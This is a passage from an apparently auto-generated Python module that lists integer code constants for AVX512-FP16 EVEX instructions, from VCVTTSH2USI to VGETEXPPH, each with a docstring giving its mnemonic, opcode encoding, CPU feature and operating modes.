EVEX_VCVTTSH2USI_R64_XMMM16_SAE: int = 4399
"""
``VCVTTSH2USI r64, xmm1/m16{sae}``
``EVEX.LIG.F3.MAP5.W1 78 /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTUDQ2PH_XMM_K1Z_XMMM128B32: int = 4400
"""
``VCVTUDQ2PH xmm1 {k1}{z}, xmm2/m128/m32bcst``
``EVEX.128.F2.MAP5.W0 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PH_XMM_K1Z_YMMM256B32: int = 4401
"""
``VCVTUDQ2PH xmm1 {k1}{z}, ymm2/m256/m32bcst``
``EVEX.256.F2.MAP5.W0 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUDQ2PH_YMM_K1Z_ZMMM512B32_ER: int = 4402
"""
``VCVTUDQ2PH ymm1 {k1}{z}, zmm2/m512/m32bcst{er}``
``EVEX.512.F2.MAP5.W0 7A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PH_XMM_K1Z_XMMM128B64: int = 4403
"""
``VCVTUQQ2PH xmm1 {k1}{z}, xmm2/m128/m64bcst``
``EVEX.128.F2.MAP5.W1 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PH_XMM_K1Z_YMMM256B64: int = 4404
"""
``VCVTUQQ2PH xmm1 {k1}{z}, ymm2/m256/m64bcst``
``EVEX.256.F2.MAP5.W1 7A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUQQ2PH_XMM_K1Z_ZMMM512B64_ER: int = 4405
"""
``VCVTUQQ2PH xmm1 {k1}{z}, zmm2/m512/m64bcst{er}``
``EVEX.512.F2.MAP5.W1 7A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUSI2SH_XMM_XMM_RM32_ER: int = 4406
"""
``VCVTUSI2SH xmm1, xmm2, r/m32{er}``
``EVEX.LIG.F3.MAP5.W0 7B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUSI2SH_XMM_XMM_RM64_ER: int = 4407
"""
``VCVTUSI2SH xmm1, xmm2, r/m64{er}``
``EVEX.LIG.F3.MAP5.W1 7B /r``
``AVX512-FP16``
``64-bit``
"""
EVEX_VCVTUW2PH_XMM_K1Z_XMMM128B16: int = 4408
"""
``VCVTUW2PH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.F2.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUW2PH_YMM_K1Z_YMMM256B16: int = 4409
"""
``VCVTUW2PH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.F2.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTUW2PH_ZMM_K1Z_ZMMM512B16_ER: int = 4410
"""
``VCVTUW2PH zmm1 {k1}{z}, zmm2/m512/m16bcst{er}``
``EVEX.512.F2.MAP5.W0 7D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTW2PH_XMM_K1Z_XMMM128B16: int = 4411
"""
``VCVTW2PH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.F3.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTW2PH_YMM_K1Z_YMMM256B16: int = 4412
"""
``VCVTW2PH ymm1 {k1}{z}, ymm2/m256/m16bcst``
``EVEX.256.F3.MAP5.W0 7D /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VCVTW2PH_ZMM_K1Z_ZMMM512B16_ER: int = 4413
"""
``VCVTW2PH zmm1 {k1}{z}, zmm2/m512/m16bcst{er}``
``EVEX.512.F3.MAP5.W0 7D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VDIVPH_XMM_K1Z_XMM_XMMM128B16: int = 4414
"""
``VDIVPH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.MAP5.W0 5E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VDIVPH_YMM_K1Z_YMM_YMMM256B16: int = 4415
"""
``VDIVPH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.MAP5.W0 5E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VDIVPH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4416
"""
``VDIVPH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.MAP5.W0 5E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VDIVSH_XMM_K1Z_XMM_XMMM16_ER: int = 4417
"""
``VDIVSH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.F3.MAP5.W0 5E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMADDCPH_XMM_K1Z_XMM_XMMM128B32: int = 4418
"""
``VFCMADDCPH xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F2.MAP6.W0 56 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMADDCPH_YMM_K1Z_YMM_YMMM256B32: int = 4419
"""
``VFCMADDCPH ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F2.MAP6.W0 56 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMADDCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4420
"""
``VFCMADDCPH zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.F2.MAP6.W0 56 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDCPH_XMM_K1Z_XMM_XMMM128B32: int = 4421
"""
``VFMADDCPH xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F3.MAP6.W0 56 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDCPH_YMM_K1Z_YMM_YMMM256B32: int = 4422
"""
``VFMADDCPH ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F3.MAP6.W0 56 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4423
"""
``VFMADDCPH zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.F3.MAP6.W0 56 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMADDCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4424
"""
``VFCMADDCSH xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F2.MAP6.W0 57 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4425
"""
``VFMADDCSH xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.MAP6.W0 57 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMULCPH_XMM_K1Z_XMM_XMMM128B32: int = 4426
"""
``VFCMULCPH xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F2.MAP6.W0 D6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMULCPH_YMM_K1Z_YMM_YMMM256B32: int = 4427
"""
``VFCMULCPH ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F2.MAP6.W0 D6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMULCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4428
"""
``VFCMULCPH zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.F2.MAP6.W0 D6 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMULCPH_XMM_K1Z_XMM_XMMM128B32: int = 4429
"""
``VFMULCPH xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.F3.MAP6.W0 D6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMULCPH_YMM_K1Z_YMM_YMMM256B32: int = 4430
"""
``VFMULCPH ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.F3.MAP6.W0 D6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMULCPH_ZMM_K1Z_ZMM_ZMMM512B32_ER: int = 4431
"""
``VFMULCPH zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{er}``
``EVEX.512.F3.MAP6.W0 D6 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFCMULCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4432
"""
``VFCMULCSH xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F2.MAP6.W0 D7 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMULCSH_XMM_K1Z_XMM_XMMM32_ER: int = 4433
"""
``VFMULCSH xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.MAP6.W0 D7 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4434
"""
``VFMADDSUB132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 96 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4435
"""
``VFMADDSUB132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 96 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4436
"""
``VFMADDSUB132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 96 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4437
"""
``VFMADDSUB213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 A6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4438
"""
``VFMADDSUB213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 A6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4439
"""
``VFMADDSUB213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 A6 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4440
"""
``VFMADDSUB231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 B6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4441
"""
``VFMADDSUB231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 B6 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADDSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4442
"""
``VFMADDSUB231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 B6 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4443
"""
``VFMSUBADD132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 97 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4444
"""
``VFMSUBADD132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 97 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4445
"""
``VFMSUBADD132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 97 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4446
"""
``VFMSUBADD213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 A7 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4447
"""
``VFMSUBADD213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 A7 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4448
"""
``VFMSUBADD213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 A7 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4449
"""
``VFMSUBADD231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 B7 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4450
"""
``VFMSUBADD231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 B7 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUBADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4451
"""
``VFMSUBADD231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 B7 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4452
"""
``VFMADD132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 98 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4453
"""
``VFMADD132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 98 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4454
"""
``VFMADD132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 98 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4455
"""
``VFMADD213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 A8 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4456
"""
``VFMADD213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 A8 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4457
"""
``VFMADD213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 A8 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4458
"""
``VFMADD231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 B8 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4459
"""
``VFMADD231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 B8 /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4460
"""
``VFMADD231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 B8 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD132PH_XMM_K1Z_XMM_XMMM128B16: int = 4461
"""
``VFNMADD132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 9C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD132PH_YMM_K1Z_YMM_YMMM256B16: int = 4462
"""
``VFNMADD132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 9C /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4463
"""
``VFNMADD132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 9C /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD213PH_XMM_K1Z_XMM_XMMM128B16: int = 4464
"""
``VFNMADD213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 AC /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD213PH_YMM_K1Z_YMM_YMMM256B16: int = 4465
"""
``VFNMADD213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 AC /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4466
"""
``VFNMADD213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 AC /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD231PH_XMM_K1Z_XMM_XMMM128B16: int = 4467
"""
``VFNMADD231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 BC /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD231PH_YMM_K1Z_YMM_YMMM256B16: int = 4468
"""
``VFNMADD231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 BC /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4469
"""
``VFNMADD231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 BC /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4470
"""
``VFMADD132SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 99 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4471
"""
``VFMADD213SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 A9 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMADD231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4472
"""
``VFMADD231SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 B9 /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4473
"""
``VFNMADD132SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 9D /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4474
"""
``VFNMADD213SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 AD /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMADD231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4475
"""
``VFNMADD231SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 BD /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4476
"""
``VFMSUB132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 9A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4477
"""
``VFMSUB132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 9A /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4478
"""
``VFMSUB132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 9A /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4479
"""
``VFMSUB213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 AA /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4480
"""
``VFMSUB213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 AA /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4481
"""
``VFMSUB213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 AA /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4482
"""
``VFMSUB231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 BA /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4483
"""
``VFMSUB231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 BA /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4484
"""
``VFMSUB231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 BA /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PH_XMM_K1Z_XMM_XMMM128B16: int = 4485
"""
``VFNMSUB132PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 9E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PH_YMM_K1Z_YMM_YMMM256B16: int = 4486
"""
``VFNMSUB132PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 9E /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB132PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4487
"""
``VFNMSUB132PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 9E /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PH_XMM_K1Z_XMM_XMMM128B16: int = 4488
"""
``VFNMSUB213PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 AE /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PH_YMM_K1Z_YMM_YMMM256B16: int = 4489
"""
``VFNMSUB213PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 AE /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB213PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4490
"""
``VFNMSUB213PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 AE /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PH_XMM_K1Z_XMM_XMMM128B16: int = 4491
"""
``VFNMSUB231PH xmm1 {k1}{z}, xmm2, xmm3/m128/m16bcst``
``EVEX.128.66.MAP6.W0 BE /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PH_YMM_K1Z_YMM_YMMM256B16: int = 4492
"""
``VFNMSUB231PH ymm1 {k1}{z}, ymm2, ymm3/m256/m16bcst``
``EVEX.256.66.MAP6.W0 BE /r``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB231PH_ZMM_K1Z_ZMM_ZMMM512B16_ER: int = 4493
"""
``VFNMSUB231PH zmm1 {k1}{z}, zmm2, zmm3/m512/m16bcst{er}``
``EVEX.512.66.MAP6.W0 BE /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4494
"""
``VFMSUB132SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 9B /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4495
"""
``VFMSUB213SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 AB /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFMSUB231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4496
"""
``VFMSUB231SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 BB /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB132SH_XMM_K1Z_XMM_XMMM16_ER: int = 4497
"""
``VFNMSUB132SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 9F /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB213SH_XMM_K1Z_XMM_XMMM16_ER: int = 4498
"""
``VFNMSUB213SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 AF /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFNMSUB231SH_XMM_K1Z_XMM_XMMM16_ER: int = 4499
"""
``VFNMSUB231SH xmm1 {k1}{z}, xmm2, xmm3/m16{er}``
``EVEX.LIG.66.MAP6.W0 BF /r``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFPCLASSPH_KR_K1_XMMM128B16_IMM8: int = 4500
"""
``VFPCLASSPH k1 {k2}, xmm2/m128/m16bcst, imm8``
``EVEX.128.0F3A.W0 66 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFPCLASSPH_KR_K1_YMMM256B16_IMM8: int = 4501
"""
``VFPCLASSPH k1 {k2}, ymm2/m256/m16bcst, imm8``
``EVEX.256.0F3A.W0 66 /r ib``
``AVX512VL and AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFPCLASSPH_KR_K1_ZMMM512B16_IMM8: int = 4502
"""
``VFPCLASSPH k1 {k2}, zmm2/m512/m16bcst, imm8``
``EVEX.512.0F3A.W0 66 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VFPCLASSSH_KR_K1_XMMM16_IMM8: int = 4503
"""
``VFPCLASSSH k1 {k2}, xmm2/m16, imm8``
``EVEX.LIG.0F3A.W0 67 /r ib``
``AVX512-FP16``
``16/32/64-bit``
"""
EVEX_VGETEXPPH_XMM_K1Z_XMMM128B16: int = 4504
"""
``VGETEXPPH xmm1 {k1}{z}, xmm2/m128/m16bcst``
``EVEX.128.66.MAP6.W0 42 /r``
